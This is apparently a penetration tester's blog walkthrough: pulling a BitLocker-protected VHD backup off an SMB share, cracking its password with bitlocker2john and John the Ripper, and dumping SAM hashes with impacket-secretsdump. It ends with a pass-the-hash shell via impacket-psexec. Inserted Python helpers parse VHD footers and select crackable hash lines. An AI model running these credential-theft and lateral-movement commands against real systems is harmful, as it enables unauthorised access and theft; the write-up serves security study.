How I exfiltrated a VHD file from the target and dumped the victim's credentials

Rio Darmawan
MII Cyber Security Consulting Services
4 min read, Apr 6, 2024

Hello everyone. This time I will write about exfiltrating data from a target and using that data to recover credentials that give access to the victim's system.

Disclaimer: Only for educational purpose.

Introduction

VHD? A virtual hard disk (VHD) is a disk image file format that stores the entire contents of a hard drive in a single file, including all data and structural elements (partition table and file systems). It replicates an existing drive rather than being a virtual machine itself, although VMs commonly use VHDs as their disks. The file can live anywhere the physical host can reach, and it is portable: it can be copied to a USB flash drive and moved to another machine.

Windows user POV: an attached VHD appears in Disk Management just like a physical disk. While the VHD is attached and available to the system, its icon is blue; once it is detached and unavailable, the icon reverts to gray.

Proof Of Concept

Note: I had already done reconnaissance and gained initial access to the target. I will not explain those steps here; this article covers only how the data was exfiltrated and used.

With the credential obtained during initial access, I did reconnaissance again to see which SMB shares this user can reach. The output shows that the user david has READ access to the david and IPC$ shares.

crackmapexec smb 10.xxx.xxx.xxx -u david -p xxxxxxxx --shares
share enumeration with crackmapexec

I then connected to the share with smbclient to look at its contents (-t 3600 raises the client timeout so a large download is not cut off). The share contained a .vhd file, which I downloaded with the get command.

smbclient -U david \\\\IPTARGET\\david -t 3600
found .vhd file

After downloading the .vhd file I opened it with 7-Zip, which lists the partitions inside the image, and extracted 2 .img files.

extracting the .vhd file
the two .img files

Looking at the files, it became clear that the two .img files are partition images and that the .vhd contains a BitLocker-encrypted volume. Let's set those files aside for a moment; I tried attaching the .vhd to my local Windows machine.
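As an added example (not code from the article), the following Python confirms what a practitioner would check at this step by reading bytes rather than trusting a file extension: a VHD is recognised by the conectix cookie in its 512-byte footer, and a BitLocker-encrypted NTFS volume by the -FVE-FS- OEM ID at offset 3 of its first sector, where a plain volume carries NTFS. The byte strings at the end are constructed samples, not data from the engagement.

```python
"""Fingerprint the two artifacts from the walkthrough: the .vhd container and
the partition images inside it. Added example, not the author's code; the
byte strings at the bottom are constructed test data, not real disks."""
import struct

VHD_COOKIE = b"conectix"        # opens the 512-byte VHD footer (and the header copy of dynamic VHDs)
BITLOCKER_OEM_ID = b"-FVE-FS-"  # OEM ID at offset 3 of a BitLocker-encrypted NTFS volume
NTFS_OEM_ID = b"NTFS    "       # OEM ID of a plain NTFS volume
VHD_DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}


def is_vhd(data: bytes) -> bool:
    """A VHD ends with a 512-byte footer whose first 8 bytes are 'conectix';
    dynamic and differencing VHDs also carry a copy of it at offset 0."""
    if len(data) < 512:
        return False
    return data[-512:-504] == VHD_COOKIE or data[:8] == VHD_COOKIE


def vhd_disk_type(data: bytes) -> str:
    """Read the footer's big-endian Disk Type field at offset 60."""
    footer = data[-512:]
    if footer[:8] != VHD_COOKIE:
        raise ValueError("no VHD footer at end of file")
    dtype = struct.unpack(">I", footer[60:64])[0]
    return VHD_DISK_TYPES.get(dtype, f"unknown({dtype})")


def vhd_current_size(data: bytes) -> int:
    """Footer offset 48: the virtual disk size in bytes (big-endian u64)."""
    footer = data[-512:]
    if footer[:8] != VHD_COOKIE:
        raise ValueError("no VHD footer at end of file")
    return struct.unpack(">Q", footer[48:56])[0]


def volume_kind(sector: bytes) -> str:
    """Classify a partition image by its first sector. BitLocker replaces the
    NTFS OEM ID with '-FVE-FS-', which is what marks an .img as encrypted.
    BitLocker To Go volumes keep a FAT-style boot sector and are not handled here."""
    if len(sector) < 512:
        return "too short"
    oem = sector[3:11]
    if oem == BITLOCKER_OEM_ID:
        return "bitlocker"
    if oem == NTFS_OEM_ID:
        return "ntfs"
    return "unknown"


# Constructed samples (not real disk data): a one-sector fixed VHD, a BitLocker
# volume boot sector and a plain NTFS boot sector.
_FOOTER = VHD_COOKIE + bytes(40) + struct.pack(">Q", 512) + bytes(4) + struct.pack(">I", 2)
SAMPLE_VHD = bytes(512) + _FOOTER + bytes(512 - len(_FOOTER))
SAMPLE_BITLOCKER_SECTOR = b"\xeb\x58\x90" + BITLOCKER_OEM_ID + bytes(501)
SAMPLE_NTFS_SECTOR = b"\xeb\x52\x90" + NTFS_OEM_ID + bytes(501)

if __name__ == "__main__":
    print("vhd:", is_vhd(SAMPLE_VHD), vhd_disk_type(SAMPLE_VHD), vhd_current_size(SAMPLE_VHD))
    for name, img in (("img1", SAMPLE_BITLOCKER_SECTOR), ("img2", SAMPLE_NTFS_SECTOR)):
        print(name, volume_kind(img))
```

Run it against the real files by reading the whole .vhd for is_vhd and the first 512 bytes of each extracted .img for volume_kind; an .img that reports ntfs can be mounted directly, while one that reports bitlocker is the candidate for bitlocker2john.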

When attaching the VHD, a popup appeared asking for a password to unlock it: Windows had detected the BitLocker volume. Let's go back to the two .img files we extracted earlier.

BitLocker asks for a password

Having confirmed the volume was BitLocker, I looked into how BitLocker protects a volume and how its password can be attacked offline.

I used John the Ripper (JtR) to crack it. First, bitlocker2john extracts the hash material from the encrypted volume image:

bitlocker2john -i <file.name>

Look, I got a hash from image number 1; this is getting interesting. One caveat: bitlocker2john can emit several hash lines for one volume. The $bitlocker$0$ line is the user password (with MAC verification) and is the one to attack with a wordlist; the $bitlocker$2$ and $bitlocker$3$ lines correspond to the 48-digit recovery password and are not realistic wordlist targets. Let's crack the hash.

john --wordlist=rockyou_mutation.txt bitlocker.hash
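Added example, not the author's code: a small parser for bitlocker2john output that validates each line's field lengths and keeps only the type-0 (user password, MAC-verified) hashes, so the wordlist run is not wasted on recovery-password lines. The field layout follows the $bitlocker$type$salt_len$salt$iterations$nonce_len$nonce$data_len$data lines bitlocker2john emits; the sample lines below are constructed and contain no real key material.

```python
"""Pick the hash worth cracking from bitlocker2john output. Added example, not
the author's code; sample hash lines are constructed filler, not real keys."""

# bitlocker2john tags each extracted protector with a type number:
#   0  user password, MAC-verified      <- the wordlist target
#   1  user password, no MAC check      (faster, may report false positives)
#   2  recovery password, MAC-verified  (48 random digits: not a wordlist target)
#   3  recovery password, no MAC check
HASH_KINDS = {
    0: "user password (MAC)",
    1: "user password (no MAC)",
    2: "recovery password (MAC)",
    3: "recovery password (no MAC)",
}


def parse_bitlocker_hash(line: str) -> dict:
    """Split one hash line into fields and check each hex blob against its length field."""
    parts = line.strip().split("$")
    # ['', 'bitlocker', type, salt_len, salt, iterations, nonce_len, nonce, data_len, data]
    if len(parts) != 10 or parts[0] != "" or parts[1] != "bitlocker":
        raise ValueError("not a bitlocker2john hash line")
    htype = int(parts[2])
    fields = {
        "type": htype,
        "kind": HASH_KINDS.get(htype, "unknown"),
        "iterations": int(parts[5]),
    }
    for name, len_field, hexstr in (("salt", parts[3], parts[4]),
                                    ("nonce", parts[6], parts[7]),
                                    ("data", parts[8], parts[9])):
        blob = bytes.fromhex(hexstr)  # raises ValueError on non-hex input
        if len(blob) != int(len_field):
            raise ValueError(f"{name}: length field {len_field} but {len(blob)} bytes present")
        fields[name] = blob
    return fields


def select_crackable(lines) -> list:
    """Return only type-0 lines (user password, MAC-verified). Recovery-password
    lines are dropped: they derive from 48 random digits, so a wordlist run
    against them burns GPU time and proves nothing. Malformed lines are skipped."""
    keep = []
    for line in lines:
        if not line.strip():
            continue
        try:
            if parse_bitlocker_hash(line)["type"] == 0:
                keep.append(line.strip())
        except ValueError:
            continue
    return keep


def _sample_line(htype: int, salt: str, nonce: str, data: str) -> str:
    """Build a constructed hash line in bitlocker2john's layout (salt 16, nonce 12, data 60 bytes)."""
    return f"$bitlocker${htype}$16${salt}$1048576$12${nonce}$60${data}"


# Constructed output for a volume with a password protector and a recovery-key
# protector; the hex values are filler, not real BitLocker data.
SAMPLE_OUTPUT = "\n".join([
    _sample_line(0, "00" * 16, "01" * 12, "ab" * 60),
    _sample_line(1, "00" * 16, "01" * 12, "ab" * 60),
    _sample_line(2, "ff" * 16, "02" * 12, "cd" * 60),
    _sample_line(3, "ff" * 16, "02" * 12, "cd" * 60),
])

if __name__ == "__main__":
    for line in select_crackable(SAMPLE_OUTPUT.splitlines()):
        print(line)
```

Write the selected line(s) to bitlocker.hash and run john as shown above; the dropped type-1 line would also accept the same password but without the MAC check, so a hit there needs confirming against the type-0 hash or the volume itself.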

After john cracked the hash, I entered the recovered password in the BitLocker popup, and yes, it unlocked: I could browse the contents of backup.vhd. AND GOTCHA! It contained the SAM and SYSTEM files!

I then copied the SAM and SYSTEM hives to Kali and dumped the credentials from the SAM hive with Impacket's secretsdump:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL
dumping hashes with impacket-secretsdump

With the Administrator NT hash in hand, I passed the hash with impacket-psexec to get a high-privilege shell on the target server.

compromised target

I hope this article gives readers a new point of view. Thanks for reading!
